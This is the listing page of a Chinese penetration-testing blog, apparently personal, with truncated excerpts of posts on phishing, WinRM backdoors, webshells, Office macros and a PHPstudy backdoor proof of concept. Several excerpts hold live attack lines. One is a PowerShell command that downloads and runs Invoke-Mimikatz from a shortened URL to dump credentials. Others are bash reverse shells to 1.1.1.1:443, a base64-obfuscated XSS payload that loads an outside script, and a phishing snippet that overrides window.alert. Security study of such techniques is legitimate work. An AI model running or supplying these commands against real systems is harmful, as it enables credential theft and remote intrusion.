BugMan

所有的胜利,与征服自己的胜利比起来,都是微不足道;所有的失败,与失去自己的失败比起来,更是微不足道.

钓鱼

1x0 Flash钓鱼 代码片段1: window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.a...

Posted by BugMan on October 10, 2020

WinRM后门

WinRm进行Shell管理

WinRM服务 WinRM全称是Windows Remote Management,是微软服务器硬件管理功能的一部分,能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统,获得一个类似Telnet的交互式命令行shell,而底层通讯协议使用的是HTTP。 # 开启WinRM服务 在Windows 2012以上的服务器操作系统中,WinRM服务默认启动并监...

Posted by BugMan on October 1, 2020

Mimikatz读取chrome浏览器cookies,password

Mimikatz读取密码

1.2免杀抓取密码的两种方式 powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" tips:powershell 默认windows visa后才有 procdump lsass 进程导出技巧 C:\temp\procd...

Posted by BugMan on June 29, 2020

阶段性沉淀

一段时间小结

阶段沉淀 1.1 xss 标签有效载荷-用于绕过设计不当的具有HTML5 autofocus属性的黑名单系统。 atob()解码base64 "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vMHh0...

Posted by BugMan on June 3, 2020

office 宏

学习excel

office 宏 本文转自 AnonySec大佬 本文链接: https://payloads.cn/2019/1209/basic-use-of-office-macros.html 前言 Office宏,译自英文单词Macro。宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动...

Posted by BugMan on May 1, 2020

个人工具收集

分享个人工具集合

个人工具总结 子域名 https://phpinfo.me/domain/ http://dns.bufferover.run/dns?q=baidu.com (q后面跟域名) https://www.virustotal.com/gui/home/upload https://urlscan.io/result/62406eb6-acf3-4ef9-a175-d4875f2421...

Posted by BugMan on April 30, 2020

反弹shell备忘录

各种反弹

Bash TCP: Victim: bash -i >& /dev/tcp/1.1.1.1/443 0>&1 /bin/bash -i > /dev/tcp/1.1.1.1/443 0<& 2>&1 exec 5<>/dev/tcp/1.1.1.1/443;cat <&5 | while read...

Posted by BugMan on April 29, 2020

服务器中间件漏洞

Apache.Tomcat.Nginx

IIS IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 IIS目前只适用于Windows系统,不适用于其他操作系统。 解析漏洞 IIS 6.x 基于文件名 该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; ...

Posted by BugMan on April 29, 2020

404 not found Webshell

骚思路

404 not found Webshell 克隆或下载项目: git clone https://github.com/CosasDePuma/SecurityNotFound.git SecurityNotFound cd SecurityNotFound 安装 src/404.php文件应位于目标服务器上。 该服务器必须具有执行.php文件的能力。 这是服务器所在的一些最常见...

Posted by BugMan on April 26, 2020

PHPstudy后门

POC,EXP

PHPstudy后门 POC GET /1.php HTTP/1.1 Host: xx Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63...

Posted by BugMan on April 26, 2020

FEATURED TAGS
msf 渗透测试 CVE POC 提权 内网 Webshell PHP Python 代码 编程 EXP 漏洞复现 中间件 反弹Shell Tools 工具 office XSS google Shell 后门 Flash 钓鱼
ABOUT ME

要努力使每一天都开心而有意义,Hard!!!

✉️ shell@outlook.sk

FRIENDS